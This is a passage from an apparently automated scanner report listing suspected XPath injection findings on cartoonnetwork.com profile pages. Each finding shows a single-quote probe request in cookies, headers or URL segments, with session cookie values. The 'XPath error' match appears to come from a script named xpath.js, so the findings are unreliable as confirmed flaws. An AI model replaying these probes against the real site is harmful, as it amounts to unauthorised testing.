The s_cc cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_cc cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Acoustic/Jasmine/Genius/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true'; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:08 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:58 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43183
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.109. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Acoustic/Jasmine/Genius/index.html

Issue detail

The s_sq cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_sq cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Acoustic/Jasmine/Genius/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA'; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:11 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:57 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43183
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.110. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [s_vi cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Acoustic/Jasmine/Genius/index.html

Issue detail

The s_vi cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_vi cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Acoustic/Jasmine/Genius/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]'; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:10 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:58 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43183
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.111. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [1401316autoFreqCap cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Hector/Warrior/index.html

Issue detail

The 1401316autoFreqCap cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the 1401316autoFreqCap cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Hector/Warrior/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0'; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:00 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:47 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43442
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.112. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [JSESSIONID cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Hector/Warrior/index.html

Issue detail

The JSESSIONID cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the JSESSIONID cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Hector/Warrior/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290'; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:59:54 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:45 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43442
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.113. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Hector/Warrior/index.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles'/Active/Hector/Warrior/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:00:03 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.114. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Hector/Warrior/index.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active'/Hector/Warrior/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:00:06 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.115. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Hector/Warrior/index.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Hector'/Warrior/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:00:09 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.116. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Hector/Warrior/index.html

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Hector/Warrior'/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:00:11 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.117. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Hector/Warrior/index.html

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Hector/Warrior/index.html' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:00:14 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.118. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Hector/Warrior/index.html

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Hector/Warrior/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;
Referer: http://www.google.com/search?hl=en&q='

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:03 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:47 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43442
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.119. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Hector/Warrior/index.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Hector/Warrior/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:02 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:45 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43442
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.120. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [adDEmas cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Hector/Warrior/index.html

Issue detail

The adDEmas cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the adDEmas cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Hector/Warrior/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&';

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:01 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:47 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43442
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.121. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [adDEon cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Hector/Warrior/index.html

Issue detail

The adDEon cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the adDEon cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Hector/Warrior/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true'; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:00 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:47 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43442
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.122. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Hector/Warrior/index.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Hector/Warrior/index.html?1'=1 HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:02 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:45 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43442
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.123. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [route cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Hector/Warrior/index.html

Issue detail

The route cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the route cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Hector/Warrior/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3'; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:59:57 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:47 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43442
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.124. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [s_cc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Hector/Warrior/index.html

Issue detail

The s_cc cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_cc cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Hector/Warrior/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
